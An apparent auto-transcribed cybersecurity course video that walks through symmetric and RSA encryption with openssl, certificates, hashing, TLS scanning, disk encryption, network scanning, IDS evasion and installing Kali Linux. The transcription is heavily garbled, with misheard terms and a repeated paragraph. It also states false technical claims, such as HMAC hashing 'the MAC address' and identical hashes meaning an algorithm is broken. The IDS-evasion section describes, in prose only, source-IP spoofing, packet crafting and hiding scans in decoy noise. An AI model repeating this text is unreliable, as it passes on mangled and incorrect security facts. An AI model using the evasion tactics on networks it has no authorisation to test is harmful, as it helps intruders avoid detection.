It's also faster
than a symmetric
and you can use algorithms

like d EAS or a s
as those are both symmetric

key cryptography algorithms
and you can use a utility

like a a script.
Let me just demonstrate
how a symmetric key

cryptography works.
So for this we can use

a tool called a a script.
So in a a script is
actually available for Linux
and Windows and Mac

all the systems.
So I'm using it
on the Windows one and I'm using

the console version.
So first of all,
I have a text file

called text or txt.
So let me just show that to you.
So we as you guys can see
I have this thing called text

up txt now to do text or txt.
All I let me just show

what x dot txt contains.

it has a sentence.
The quick brown fox jumped

over the lazy dog.
So that's the sentence
that has all the alphabets

in the English language rather.
So now we are going

to try and encrypt it
so we can use
something like a SIDS
because both of them
are symmetric key ciphers

symmetric key algorithms rather.
So we are using AES

in this case.
So what we're going

to do is say s script
I'm going to encrypt it
and we're going to give

you the password
of let's say Pokemon.
We're going to call it

Pokémon and regarding
do Do text Dot txt.
We're gonna encrypt that file.
So now we have
encrypted that file.
Let's go see we must

be having a new file.
So this is called text

or txt that a yes.
So that is our encrypted file.
And this is what we would

generally send over the network
if we are sending it to anybody.
So let's assume
the person who's received.
It also knows
our encryption algorithm.
I mean encryption
algorithm and the key
that goes along with it.
So let's try to decrypt it

now now before I decrypted,
let me just show you What
an encrypted message looks
like so this is
what the ciphertext look

like a snow text Dot txt.
The AES.
So yeah,
as you guys can see

the windows control control
you she'd everything
but if I were to go here I

will just go into the file
and just ever notepad

plus plus you'll see
that it's a bunch of crap.
You really can't make out

anything what is being made?
Here we come.
Really decipher much.
So that's the point

of using encryption.
Now if you were to decrypted,
all you have to do is

a script we turned the crib.
We're trying to give

the password is going to be
what was the password

Pokémon I'll K
so and we're going to try

and create text txt.
The AES.
Let's dir that again.
Okay, so that just the crypts

are message for us.
So this is
how you would use a script

for encryption and decryption.
So that just
description and that's
how you would use symmetric key

encryption to encrypt a file
for this example symmetric key
uses the either a stream

Cipher or a block Cipher
and the differences

between stream or block ciphers.
Is that block takes a block

of bits at a time
and it's a fixed length.
For example 64 bits
if I were to use
a block Cipher with 64 bits,
I would need to take him 64 bits
before I could
start encrypting now
if I didn't have 64 bits
to encrypt I would have

to fill it with padding
in order to get
up to 64 bits a stream Cipher
on the Other hand
it will encrypt a bit at a time.
So it doesn't matter
how many bits you've got.
You don't need

to have some multiple
of the block length in order

to encrypt without padding.
And another type of cryptography

is a symmetric now asymmetric
as you would expect users

to different keys.
And that's where we have

public key and private key
a symmetric key cryptography

uses a longer Keelan
and also has more computation
and the encryption

process is slower
with a symmetric key encryption
and the encryption process
is slower than with

a symmetric key encryption
while the For symmetric key is

for signing documents
or emails for example,
but I would have

the private key sign something
and the public key would be used

to verify a signature
and another reason
for using a symmetric key

encryption is to ensure
that you got it from

who actually sent it
since you've got two keys.
You always knew who

the other end of the equation is
where it's symmetric

key senses just one key.
If you can intercept

the key you can decrypt
and also encrypt messages.
And so if somebody can figure

out the key you can break
into a communication
stream using symmetric.
Turkey and scription

so asymmetric gives you
the advantage of ensuring

that the other end is who
the other end says and they are
since they're the only ones

who should have the private key
and in this particular

instance in practice.
However, however hybrid

encryption models tend
to be used and that's
where you would use
a symmetric encryption to
encrypt asymmetric session keys.
So basically you
encrypt the message
that you are sending using

symmetric key encryption
and then you
when Changing the key
with somebody else you use

a symmetric key encryption.
So this is going to be
a slower process.
You probably won't want

to use it for a smaller files
in order to do that.
Fortunately the file example

that I have is a smaller one.
So I'm going to try

and generate a key right now.
So for this we have to head over

to our Ubuntu system.
So let's see.
Let me show you how public

key encryption actually works
and we are going

to first create a key.
So let me just clear

this out for you.
First of all.
Let's create a file and

let's call that text Dot txt.
Now.
If you see we are going to edit

text or txt to have some file.
So have some text in it.
So there seems to be
a warning with the GDK.
I'll just use Echo instead.
So now let's see

if that is in our file.
Okay.
So let me just show you

how a symmetric key encryption
or public key
cryptography works.
So first of all,
we need a text file.
So let me see do we
have a text file?
a text Dot txt.
So let's see what

this text Dot txt says
so it says that this is

a random text file.
Now, what we want to do is
we want to create
a public key first,
so I'm going to use

openssl for doing this.
This so we go openssl
and we are going to use it
with our say so we're trying

to generate a key.
So generous e and we're going
to use this tree to use this
and we're going to Output it

into file called private key.
So we are also going

to be using a 4 0 9 6 bit.
So this is going
to be our private key.
So this will create a private

key using RSA algorithm.
So let it work its way out.
So first of all,
it's asking me
for the past three days now,
so since You can protect

your keys with the passphrase.
So I'm just going

to use my name.
Okay.
So now we see
if we LS and we have
a private key, I guess.
Yep.
So we have this private key.
Now.
We're using this private key.
We are going to generate

a public key.
So for this I'm again

going to be using open SSL
and open SSL is unix-based.
So you will need a Unix system.
So you go are say utl.
That's RC utility.
And what we want

to do is encrypt
and we want the public key
in and key and we want

to use the public key
that we just generated.
I'm sorry guys.
So we are going
to be using Odyssey.
So first of all,
we need to generate
a public key.
So for that we use

the private key.
So we will give the private

key as an argument
after the in flag.
So private key and we are trying

to get out a public key.
So pop out and we're going

to call public dot key.
Okay, so there seems to be Okay.
I messed it up a little I
forgot to give the output
so you go out and then

you use public key.
So it's asking me
for a passphrase
and now it's writing

the are sticky and
since the password was correct.
We have a public key to so
if you see now we have

a public key and a private key.
So we are going to encrypt

our file using the public key.
So we go openssl
and we go RS a utl.
And we go and crypt
and we can do pump in.
So we are going
to use the public key
and we want to put

the text at the XT
as the file to be encrypted.
So text Dot txt.
And what we want to Output

is an encrypted file.
So encrypted Dot txt.
Okay, I call it open SL L

need to go and edit that out.
Yeah, so that makes

it a correct command
and now we have

an encrypted file.
So let's see Alice and yep

encrypted dot txt.
So if you just cut that out,
so we see it's
a bunch of garbage
and we really can't read it
unless we decrypt it so
or decrypting the key.
All we have to do
is again use openssl.
Let's clear this out

first so openssl.
And we are going to be using

the RC utility again.
So RSA utl.
We're going to
decrypt this time.
So we go with the decrypt flag
and then we are going

to be giving the inky
and that is going
to be the private key
and what we want to decrypt

is encrypted the txt.
And what we want output it is

as let's say plain text txt.
So it's going to ask me

for my past rays,
which is mine.
Name and I've entered

the passphrase and now
we have a plain text Dot txt.
Now.
If we are to go and LS we see
that we have a plain

text txt out here just
with light info dot txt.
Let me just cut that out.
So plain text D XD.
So this is a random text file.
And if you go up we see
that it was a bunch

of garbage and before that.
It was a random text file.
Now, you can also run

this command called
if plain text Dot Txt text txt.
So this give you a difference

in the text rings.
So it's zero so it gives you

that's the difference.
So both files are the same
and that's how public

key cryptography works
and how symmetric

key cryptography works.
Okay.
Now moving ahead

of cryptography.
Let's talk about certificates.
Okay.
So now that we're done

with cryptography.
Let's talk about

digital certificates.
So what is
a digital certificate?
Well, a digital certificate

is an electronic password
that allows a person

or can ization to exchange
data securely over the internet

using public key infrastructure.
So digital certificate
is also known as
a public key certificate
or an identity certificate now

digital certificates are a means
by which consumers
and businesses can utilize

the Security application
of public key
infrastructure public
key infrastructure comprises

of the technology to enable
and secure e-commerce and

internet based communication.
So what kind of security does

a certificate provide so firstly
it provides identification
and Authentication Asian

the person or entities
with whom we are communicating
I really who they say they are
so that is
proved by certificates.
So then we have confidentiality

of information within a message
or transaction is
kept confidential.
It may only be read
and understood by
the intended sender.
Then there's Integrity

there's non-repudiation
the center cannot deny

sending the message
or transaction the receiver

really get to non-repudiation
and I'll explain
how non-repudiation comes

into digital certificates.
So digital certificates
are actually issued
by By authorities
who are business
who make it their business to

actually certify certify people
and their organization

with digital certificates.
Now, you can see these

on Google Chrome now,
let me just open

Chrome for you guys
and you can see it out here.
You can see certificates
and you can go into the issue

of statements and you can go
and all sorts of stuff
so you can see it's issued

by encrypt Authority X3.
So that's an issuing authority

for digital certificates.
Now that was all about

the theory of certificates.
Let's go and see

how you can create one.
Go to create
a digital certificate.
We are going to be using

the openssl tool again.
So first of all,
let me show you

how to create a certificate.
So we are going to be using

the openssl tool for that.
So first of all,
let me clear the screen out.
So in this case, I'm going

to generate a certificate
Authority certificate.
So I'm doing an artistic

key here to use
inside the certificate.
So first of all,
I need to generate
a private key.
So to do that as I had just
showed you guys we can use

the openssl tool ego openssl
and Jen are say and we're going
to use test three then

Ouches and let's call it c
a DOT key and we're

going to use 4 0
9 6 this so I'm doing

an RSA key here to use
inside the certificate
some generating private key and
the private key is used as

a part of the certificate
and there's a public key

associated with the certificate.
So you've got public and private
key and data gets encrypted

with the public key
and then gets decrypted

with the private key.
So they are mathematically

linked that the public
and private key
because you need one for the end

of the communication the
and the other for the the other

end of the communication
and they have to be linked

so that the data
that gets encrypted
with one key catch

to be decrypted with other key.
So this is asking
for a passphrase
and so I'm going to be giving
my name as a passphrase so that

has generated the key for us.
So now I'm going to generate

the certificate itself.
So I'm going to be using

the openssl utility.
So first of all,
you say openssl nice a request,
so it will be a new request
and it's going to be

An x.509 request it's going
to be valid for 365 days.

And let's see the key
is going to be see a DOT key
and we're going

to Output it into CA
or let's call it at Eureka dot
c r t so this is certificate
that I'm producing in the name
of the company that

I'm working for.
So that is at Eureka.
So it says it's unable

to load the private key.
Let me just see

as the private key existing.
I had a previous.
Private key.
So let me just remove
that doesn't have

a see a DOT key seems
like I put the name differently.
So let me just try

that again openssl
and we do request
so we are requesting
new certificate and

it's going to be x509
and it's going to be there

for 365 days and key is He
apparently that's
where it's cold out here.
So and it's going to be out

into Eddie record CRT.
That's another so
let's enter the past three.
So it's my name.
So now it's going to ask

me a bunch of information
that's going to be
inside the certificate.
So let's say it's asking

the country name
against let's put in the state.
Okay.
So iin State Province

named some states.
So Bangalore look ality.
Let's say white Field

organization name is Eddie.
Rekha unit name brain

Force common name.
Let's leave that

out email address.
Let's leave that out too,

and we have a certificate.
So if you go and list

all your files,
you'll see that there is

a certificate called any record
or CRT out here,
which is highlighted.
Okay.
So now if you want

to view this file,
you could always use the openssl

you can always use the openssl.
Utility, so you say you want to

read an extra five nine request
and you wanted to text
and what you want

to see is at Eureka CRT.
Okay, so that
is the certificate.
So you see
that it has all the signature
it has signature algorithm.
It has all the information

about the certificate
and it says signature issuer is

cin and state Bangalore
and location right field.
I wreck up reinforce velocity.
It has all sorts of information.
Nation so that was all
about digital certificates how

who issues digital certificates?
Where are they useful?
So this is
basically non-repudiation.
So nobody can say

with this certificate that
if this certificate is included

in some sort of website
and that website tends

to be samples malicious
and there's a complaint

now the website can go
to a court of law and say

they didn't know about this
because the certificate
that was included had

their private key and
private key was only supposed

to be known to the company
so that Non-repudiation
you just don't deny
that you didn't do it.

about certificate not moving on.
Okay.
So moving on we're
going to be talking
about cryptography caching.
And while the word

cryptography is in
the term cryptography caching

and it does lead to believe
that there is encryption Vault.
There is no encryption involved

in a cryptographic hash.
There is a significant
difference between hashing
and any sort of encryption

and that is primarily
that encryption is
a two-way process
when I encrypt a piece of data

or a file or anything else.
So what I'm doing

is putting it into a state
where I expect it to be able

to get it back out again,
in other words
when I interrupt a file

expect it to be able
to decrypt the file and get
the original contents hashing
is a one-way function
on the other hand.
Once I've hashed piece of data

or file there is no expectation
and ability to get

the original piece
of data back hashing

generates a fixed length value
and different types
of hashing will generate

different length values.
For example, md5 will generate
a different length value
than sha-1 And they're

both hashing algorithms,
but they generate

different length values
and the resulting value

from a hash function
should be no relation at all

to the original piece of data.
As a matter of fact,
if two inputs generate

the same hash value
it's called the collision and

if you can generate collisions,
you may be able to get a point
where you can generate

a piece of data
that are going to generate

the same hash values
and that leads you to

the potential ability to break
the particular hashing algorithm
that you're using.
So what we can use hash is
for well one thing we can use

hashes for file in text.
T we can run a hash
on a file and get

a value back and later.
We can check
that the value make sure

if it's the same
if it's the same I can be sure
that the same file was hashed

in both instances.
an example of what I just said
that if we Hash
a file we will get
the same hash every time so

remember the certificate
that we just created.
Let me just log in again.
So we are going
to Hash this certificate and it

will create a certain hash
and we are going to see
that every time

we hash it we are.
Being the same hash
so we can use this command

called md5sum and we can do
Eddie record or CRT.
So this is the harsh produced
after you've hatched

at your record or CRT.
So if I do an md5 again,
so md5 is a hashing algorithm
that you should move so

at your record or CRT
and it will produce
very similar has let's see

a sha-1 works like this.
So sha-1 and you record or CRT?
Okay, Xiao Chuan
is sha the shuffle

in the shower you tools back?
Courage.
Okay, so I proved
my point that but md5
if it is cryptography
hashing algorithm.
We are getting
the same hash back.
So if you are able

to produce the same hash
that means you have broken

the algorithm in itself.
So if you run md5 on the knocks,
you can get a version

of md5 and md5 summation program
on Windows and Mac OS
where with the utility

md5 is does the same thing.
So I just showed you

the file and I hashed it
and another reason we use

hashing is we are storing
passwords so password.
Stored after hashing,

we hashed passwords.
And the reason

for hashing password is
so you're not storing

the password in clear text
which would be easily seen in
if you got it protected

with low emissions
if I hashed password
every time I hash the password,
I'm going to get the same value

back from the same algorithm.
So what I do is store
the hash and some sort
of password database
since it's a one-way function.
You can't get the password

back directly from the hash.
Now what you can do
with most password
cracking programs do
some variation of this
and you just generate hashes

against list of words.
If you look at a hash value
that matches the one

in the password
once you get the hash
that matches the one

in the password, you know,
what password is there
and here and we come back

to the idea of collisions
if I can take
two different strings
of characters and get

the same values back
and it's easier

to crack the password
because I mean not necessarily

get the password with the hash
that I get back from particular

string of data is the same
as that I get from

the original password,
then it doesn't matter

whether I know the password
because the string of data
that I put in is going

to generate the same hash value
that you're going to compare

when Login and this hash value
will just give you
that as valid and you

will be able to login.
So suppose the password

that you chose
while making your account is dog
and the dog word

produces this hash value
and if I were to like hash cat
with the same algorithm

and if the other
than was prone to collisions,
it might produce
the same hash value as dog.
So with the password cat I

could open up your password.
I mean I could open

up your account.
So that was all

about hashing and hashing.
Rhythms, let's move on.
Okay.
So in this part of the video,
we are going to go
over SSL and TLS
or SSL and TLS are ways

of doing encryption
and they were developed

in order to do encryption
between websites web servers

and clients or browsers.
SSL was originally developed by

a company called Netscape and
if you don't remember

Netscape eventually spun
off their source code

and became Mozilla project
where we get Firefox
from so back in 1995 Netscape

released version 2 of SSL,
and there was a version one,

but nothing was Done with it.
So we got the version 2 of SSL

and that was used for encryption
of web transmission
between the server
and the browser

to do a whole number
of flaws between the server
and the browser now

SSL version 2 had a whole number
of flaws and SSL to has

the type of flowers
that can lead to decryption

of messages without actually
having the correct keys
and not being

the right endpoints
and so Netscape released

SSL version 3 in 1996.
And so we get SSL

3.0 which is better
than 2.0 but it still hurts.
Some issues and so

in 1999 we ended up
with TLS now SSL is secure
socket layer and TLS is

transport layer security.
They both accomplished

the same sort of thing
and they're designed

for primarily doing encryption
between web server

and web browsers
because we want to be able

to encrypt the type of traffic.
So let me show you what kind

of traffic looks like.
So first of all,
let me open bar shop
and out here.
I already have a TLS scan

ready for you guys
that you can see we have

all sorts of TLS data
so you can see
that here's my source

and it's 32 and destination
is sound 6 1 2.
4050 9.46 doing

a client key exchange
and the chain Cipher suspect

and Krypton handshake message
and then we start

getting application data.
So there are some other

steps involved here
and you're not seeing all of it
with this particular

Wireshark capture
because again, you know,
we get fragmented packets
and at some point it

starts getting encrypted
and you can see it anyways
because wash out
without having the key

can decrypt those messages
but one ends up happening
is the client sends a hello
and the silver is

Ponce with a Hello
and they end up exchanging

information as part
of that now including

version numbers supported
and you get random number
and the clients going to send

out a number of surface suits
that may want support and order

and it can support the server
and it's going to pick

from those sweet of ciphers.
Now, then we start doing

the key exchange and then
do the change Cipher spect

and from the client and server
and eventually the server

just sends a finished message
and at the point
we've got this encrypted

communication going on,
but there's this handshake
that Zone between the two

systems and there's a number
of different types
of handshakes depending
on the type of end points
that you've got.
But that's the type

of communication that goes on
between servers and the client

one important thing
about using SSL and TLS is
as I mentioned some
of the earlier versions had
vulnerabilities in them
and you want to make sure
that the server's

aren't actually running those.
So you want to run some scans

to figure out the type
of calls and ciphers
that different systems you
so for this we can use

something called SSL scan.
So this is available for Unix.
Not really sure.
If there is something
that is similar
for Windows or Mac,
but on Unix based system that is

Linux we can use SSL scan.
So let me just show

you how to use
that clear as far out.
So what we can do is run

SSL scan again suppose
www dot Ed u-- record dotco.
So we're doing Isis can hear
against the website

and you can see it's going out
and probing all

the different types of ciphers
after you know on this system

start with SSL V3
and are going to TLS
version 1 and we could force

as a substantive try
to do an SSL V2.
If I scroll back up here

I get the surface I
Firs which is SSL version

3 it's using RSA
and it's using RSA

for the asymmetric.
Now in order to do
the key exchange and
once we get the session key

up we're going to do use AES
256 and then we're going
to use the secure hash algorithm

to do the message authentication
or the Mac.
It's something calls the hmac
for the hashed message

authentication code and
what it does is simply

hashes the MAC address
that you would check one side

against the other to make sure
that the message

hasn't been fitted
with in transmission.
You can see here all

the different types
of Cipher suits that are

available peers TLS running rc4
at 40 bits using md5.
So that would be
a pretty vulnerable type
of communication to use
and between the server
and the client 40-bit

Cipher using rc4 is
a low strength Cipher and we

would definitely Recommend
that clients remove those

from the support of ciphers
that they have on their server.
All that configuration

would be done
at the web server as well as
when you generated your key

and your certificates normally
certificates would be handled

by a certificate Authority.
Now, you can also

self-signed certificates
and have those installed

in your web server
in order to Communications
with your clients
that the challenge with that is

browsers today warned when they
see a certificate against

the certificate Authority
that is entrusted of it and it

doesn't have any certificate.
Aditi tall so
you'll get a warning
in your browser indicating.
There may be a problem

with your certificate
if your clients
are Savvy enough and
if the users are Savvy

enough you may be able
to make use of these self

fine self-signed certificates
and save yourself some money,
but generally it's

not recommended simply
because clients are starting

to get these bad certificates
and when they run across one
that's really a problem

a real Rogue certificate.
They're going to ignore

the certificate message
in the browser
and just go to the sites
that could have malicious

purposes in mind and may end up
compromising the clients
or customers or users.
That's SSL and TLS
and how they work and negotiate

between servers and end points.
Okay.
So now that we've talked

about TLS and SSL.
Let's talk about

disk encryption.
Now this encryption

is actually something
that was not really difficult to

do but sort of out of the reach
of normal desktop computers

for a really long time.
Although there have long been

ways to encryption of files
and to a lesser degree

maybe entire disks
as we get faster processor

certainly encrypting
the entire disks
and being able to encrypt
and decrypt on the fly

without affecting.
Performance is something
that certainly comes

with Within Reach
and it's a feature
that shows up in most modern

operating systems to one degree
or another now these days

we are going to look
at a couple of ways here

of doing disk encryption.
I want to tell you

about one of them first
and it's not the one I
can show I can't really show

the other one either.
So with Microsoft
their Windows system have

this program called BitLocker
and BitLocker requires

either Windows Ultimate
or Windows and price.
I don't happen to have
either version so I
can't really show it.
You but I can tell you
that BitLocker has ability

to entire disk encryption
and they use a s
for the encryption Cipher

and the thing about BitLocker is
that they use a feature
that comes with most modern

systems particularly laptops.
Lll strip in them
that's called The Trusted

platform module or TPM.
The TPM chip is part
what it does is
it stores the keys
that allows operating system
to be able to access the disk

through this encryption
and decryption process and they

use a pretty strong encryption
Cipher which is a yes,
but you have to have

one of the cup Well
of different versions
of Windows in order
to be able to use BitLocker
and it's one of those things

you would normally run
in an Enterprise.
And so that's why they included

in on its Enterprise version.
Now on the Mac OS side
they have this thing called

file Vault and you see
in the system preferences

on the security and privacy.
If you go to filevault you

can turn on filevault now I
if you have the little button
that they're says

Stone on file wall,
then you can turn

on the file wall
and it would ask you

about setting up keys
and it works similar

to Those BitLocker now
pgp happens to have the ability

to do disk encryption
and you can see
that in the case of this

you burned the system.
They've got a package called

gde Crypt which is a GUI
that allows you to map and mount

a created encrypted volume
so I could run G decrypt and put

help me set up the process
of encrypting the volumes

have got on my system.
Now this conscription

is a really good idea
because when you are working
with clients the data is

normally very sensitive.
So as I mentioned
And you can always use things

like BitLocker and windows fault
or other search software's

for disk encryption.
So what I mentioned before

is now not only possible.
It's very much a reality

with current operating systems.
Now, let's talk
about scanning now

scanning is refers to the use
of computer networks
regarding computer systems
and networks canning
is mainly used to security

assessment system maintenance
and also for performing

attacks by hackers.
The purpose of network

scanning is as follows,
it allows you
to Nice available UDP
and TCP Network Services running

on a targeted host.
It allows you to recognize

filtering systems
between the users

and the targeted host.
It allows you to determine

the operating systems
and used by assessing

the IP responses.
Then it also allows you
to evaluate the target

host TCP sequence numbers
and predictability to determine

the sequence prediction attacks
and the TCP spoofing now

Network scanning consists
of Network Port scanning as
well as vulnerability scanning

Network Port scanning refers
to the method of sending

data packets via the network.
Through computer system

specified Service Port
this is to identify
the available Network Services
on that particular system.
This procedure is effective for

troubleshooting systems issues
or for tightening the system

security vulnerability scanning
is a method used to discover

known vulnerabilities
of computing systems
available on network.
It helps to detect
a specific weak spot
in an application software
or the operating system,
which could be used

to crash the system
or compromise it
for undesired purposes.
Now Network Port scanning as

well as vulnerability scanning
is an information.
Rings technique,
but when carried out
by Anonymous individuals
are viewed as a pollutant

attack Network scanning process
is like Port scans
and pink stripes
and return details
about which IP address map

to active life hose
and the type

of service they provide
another Network scanning method

known as inverse mapping gathers
details about IP addresses
that do not map to Live host
which helps an attacker to focus
on feasible addresses
Network scanning is one
of the three important methods

used by an attacker
during the footprint stage
and the attacker makes a File
of the target organization

this includes data
such as organization's
domain name systems
and email servers in additions

to its IP address range
and during the scanning stays

the attacker discovers details
about the specified IP addresses
that could be accessed online

their system architecture
their operating systems
and services running

on every computer now
during the enumeration stays
at a collects data including

routing tables Network user
and group names simple

Network management protocol data
and so on.
So now let's talk About

intrusion detection evasion.
So before we get
into IDs Salvation,
let's talk about

what exactly is an IDs now
an intrusion detection system

or IDs is a system
that honor does Network traffic

for suspicious activity
and issues alerts

when such activities discovered
while anomaly detection and

Reporting is primary function
some intrusion detection systems

are capable of taking actions
when malicious activity

or anomalous traffic is detected
including blocking traffic sent

from suspicious IP addresses,
although intrusion detection

systems monitor Network
for Ali malicious activity they

are also prone to false alarms
or false positives
consequently organizations need

to fine-tune their IDs product
when they first install them
that means properly configuring

their intrusion detection
system to recognize
what normal traffic
on the network looks
like compared to potentially

malicious activity
and intrusion prevention

system also monitors
Network packets for potentially

damaging Network traffic,
but we're an intrusion

detection system responds
to potentially malicious traffic

by logging the traffic
and issuing warning
notification intrusion
prevention systems response
to such By rejecting the

potentially malicious packets.
So there are different types

of intrusion detection system.
So intrusion detection system

come in different flavors
and detect suspicious activities

using different methods.
So kind of intrusion detection
is a network intrusion
detection systems
that is nids is it deployed

at a strategic point
or points within the network
where it can monitor

inbound and outbound traffic
to and from all the devices

on the network.
Then there is host

intrusion detection system
that is at IDs
which runs on all computers

or devices in the network.
With direct access
to both the internet
and the Enterprise internal

Network SIDS have an advantage
over any ideas in
that they have may be able to

detect anomalous Network packets
that originated from

inside the organization's
or malicious traffic
that nids has failed
to detect hid s may also be able

to identify malicious traffic
that originates from

the host itself as
when the host has been

infected with malware
and is attempting spread
to other systems signature

based intrusion detection system
monitors all packaged

traversing the network
and compare them
against database of
signatures or attributes.
I've known malicious threats

much like antivirus softwares.
So now let's talk

about into IDs evasion.
Okay.
So now let's talk

about IDs evasion.
Now IDs is
an intrusion detection system
as we just spoke about

and instead it detect exactly
the types of activities that

we are engaged in sometimes
and sometimes you may be in
called in to work on a Target
where activities are known
and should be known

by The Operators
or the operations people

involved in monitoring
and managing the network

and the idea being not only
do they want to assess

the technical controls
that are in place,
but they also want

to assess the operational
procedures and ensure
that the systems and processes

are working the way
that they are supposed

to be working.
Now when you are engaged

with the Target
that you are in full cooperation
with you don't need to do

these types of vision tactics.
All these techniques

may be actually avoided
but if you are asked

to perform an assessment
or a penetration on a Target
where they are not supposed

to see your activities,
then you need to know
some different techniques

to evade detection from an IDs.
So we're going to talk about

a couple of different things.
That you can do.

So one thing that you can do
is manipulate packaged to look
a particular way.
Now for this there is

a tool called packets.
So packet is a really good way

to actually manipulate traffic
and by actually manipulating

the contents of a packet
like you can specify

the destination and source.
So it's a really useful tool
to set up a package
look a particular way.
One thing it can do is allow

you to spoof IP addresses
so I could set
the source IP address here.
That was something completely

different from mine now
from Using TCP or UDP?
I'm not going to see

the response back.
And in this case TCP.
I'm not even going to get

the three weeks connection me
because responses are going

to go back to the source IP.
But what you can do
is an additional two spoofing

you can set a particular ways
that a packet may look
like changing the type

of service or by changing
the fragmentation of set or by

different flags settings
at me allow you through an IDs

without maybe getting flagged
and it may also allow

you to a firewall now
it's a slim possibility

but it's a possibility.
Now.
Another thing you

can do is use packets
to generate a A lot
of really bogus data
and what you might do is hide

in the noise generated by packet
so you can could create

some really bogus packets
that are sure to set

of ideas alarms
and then you can run

some legitimate scans underneath
and hopefully be able to get

some responses different
from mine now

from using TCP or UDP.
I'm not going to see

the response back.
And in this case DCP,
I'm not even going to get

the three weeks connection me
because responses are going

to go back to the source IP.
But what you can do
is an additional two spoofing

you can set up a particular ways
that a packet may look
like changing the type

of service or by changing
the augmentation offset or by

different flag settings
at me allow you through an IDs

without maybe getting flagged
and it may also allow

you to a firewall now
it's a slim possibility

but it's a possibility.
Now.
Another thing you can do is

use packet to generate a lot
of really bogus data
and what you might do is hide

in the noise generated by packet
so you can could create

some really bogus packets
that are sure to set

of ideas alarms
and then you can run

some legitimate scans underneath
and hopefully be able

to get some responses.
Kali Linux is the industry's

leading Linux distribution
and penetration testing
and ethical hacking

it offers tons
and tons of hacking

and penetration tools
and different kind

of software's by default.
It is widely recognized
in all parts of the world even
among window users

who may not even know
what Linux has well

to be precise Kali Linux
was developed by offensive

security as the rewrite
of backtrack backtrack just

like Kali Linux was a lie.
Linux distribution
that focused on security it

was used for digital forensics
and penetration testing purpose.
But the question here is why

should you choose Kali Linux
when you have other choices like

parrot security operating system
back box black art

and many more out there.
Let me list are few reasons as
to why Kali Linux is

the best choice first
and foremost it offers more than

600 penetration testing tools
from different kind

of security fields
and four and six secondly.
Kali Linux is customizable.
So if you're not comfortable

with current Kali Linux tools
or features or
graphical user interface,
you can customize

Kali Linux the way you want.
It is built
on a secure platform.
The Kali Linux team

is actually made up
of small group of individuals.
Those are the only ones

who can commit packages
and interact with repositories.
All of which is done using

multiple secure protocols.
So color Linux is definitely

a secure platform,
although penetration
tools tend to be
In an English colony includes

multilingual support this way
more users can operate

in the native language
and locate the tools
that they need for the job
that they are doing

on Kali Linux
and lastly Kali Linux just
like back truck is

completely free of charge on top
of all this benefits
Kali Linux offers different

installation options one way
of installing Kali Linux is
by making a collie
bootable USB drive.
This is the fastest way
of installing Kali Linux

and the most favorable as Well,
we will discuss why in a while.
You can also install

Kali Linux using
hard-disk installing Kali Linux
on your computer using the hard

disk is a very easy process,
but you should make sure
that your computer has

compatible Hardware.
You can also install Kali Linux

alongside your operating system.
It could be Windows or Mac,
but you should exercise caution

during setup process
because it might mess up
with your default

bios settings lastly.
You can use different kind

of virtualization software.
Just VMware or watch
a box to install Kali Linux on

your preferred operating system.
Well apart from all this you

can also set up Cal Linux
on Advanced risc machines
or a RM like Raspberry Pi
trim slice cube truck
and many more.
So there you go guys.
Now if you know what

color Linux is and why it
is a leading Linux distro

for ethical hacking

in today's session.
We will explore different ways

to install Kali Linux.
Let's get started

then all Your I said
that the fastest method
for setting up Kali Linux is

to run it live from a USB drive.
But why first of all,

it's non-destructive,
it makes no changes
to the host systems hard drive
or the operating system

that it is installed on.
So once you remove USB your

operating system will return
to its original state.

Secondly.
It's portable.
You can carry color index

in your pocket
and can run it whenever you

want just in few minutes.
It's customizable.
You can create your own.
Kali Linux ISO image and put it
into USB drive using

a simple procedure
which we will discuss

later and lastly.
It's potentially persistent.
You can configure
your Kali Linux live USB drive

to have persistent storage
so that the data you

can collect is saved
and you can use it

across different reboots.
Now.
Let's see how to create

a bootable USB drive
on Windows guys.
Actually the process

is very simple.
It's just a three step process.
First of all,
you need to plug your USB.
USB drive into an available

USB port on your Windows PC
next you need to note down

the destination drive.
It uses one set mounts.
For example, it could be

F drive after that.
You will have to download

and launch a software
called win32 disk imager

on the software.
You'll have to choose

color Linux ISO file
that needs to be
matched and verify
that the USB drive
to be overwritten is
the correct one lastly.
Once the Imaging is complete.
You need to safely

eject the USB drive
from Windows machine.
So, like I said,

it's very simple, right?
Well, I'm not going to show

you a demo on this one
because like I said,
it's very easy, and I'm sure

you guys can pull it off.
If you have any doubts.
You can post them

in the comment session.
We'll get back to you.
And as for the demo part will

be doing for installations here.
First of all,
we'll see how to install

Kali Linux using VMware
on Windows operating system.
Then we'll see
how to install Kali Linux on Mac

using virtualbox moving on.
We'll see how to install
Kali Linux tools on

different Linux distributions.
I'll A showing
how to install it on Ubuntu.
Well, the procedure is same for

every other Linux distribution.
So you can go ahead and use

the same procedure
for the Linux distribution
that you're using

and lastly we will see
how to install Kali Linux
on Windows 10 using
Windows subsystem for Linux.
So, I hope it's clear
that what we'll be learning

in the session.
Let's get started with

the first demo in this demo.
We'll see how to launch

Kali Linux using VMware.
So guys you can install

Kali Linux using
any virtualization software.
It could be VMware
or virtualbox in this demo.
I'll show you

how to install it using VMware.
So first of all,
obviously we'll have

to install VMware light.
So just type of VMware

and it's the first link
that you find you can go

ahead and download
VMware Workstation Pro

you have it in the downloads.
Here you can download

workstation player as well
or you can download

VMware Workstation Pro now.
Once that is downloaded.
You will have to download

a curl Linux ISO image
so that you will have to go

for official Kali Linux website
just type for Kali Linux
and it's the first link you

can see downloads option
here click on download
and yeah,
you can see different

download options here you
have color Linux light

for 64-bit as well as 32 bit.
And then there is

Kali Linux 64-bit and 32-bit
and you have Great images

for VMware and Wachtel boxes.
Well suppose you want to skip

the entire lengthy procedure
of installing it and you

want to just use the image,
then you can go ahead and use

this color Linux
64-bit for VMware
or virtual box same goes

for the 32-bit as well.
But since we are focusing

on installing right now,
let's just go ahead

and download ISO file
and install it from

the beginning until last step.
I have already downloaded it.
So I have an ISO file

downloaded on my computer.
So all you have to do is

just click on the torrent link.
It will be downloaded.
Let's open VMware then so

as you can see,
I have the embed workstation

Pro installed here.
So I already have two about to

Virtual Machine installed
on my VMware Workstation.
As you can see on the home page

three different options.
It says create
a new virtual machine
or open a virtual machine

and connect to remote server.
So if you want to
create a color index
or any other washing machine

from step one,
you can use this create

a new virtual machine option.
Well, if you have an image of

and watch the machine already,
and if you want to just

use it and avoid
installation procedure.
Then you can go

ahead and use this open
a virtual machine option
while just click on this

create a new virtual machine
and click on next

as you can see here.
You have an option which says
installer disc image file.
ISO file.
You'll have to attach

your so click on browse.
Let's see where I've stored

my color Linux as you can see.
I already have it here

and there's one file here.
Let me click on that and open
so I don't bother
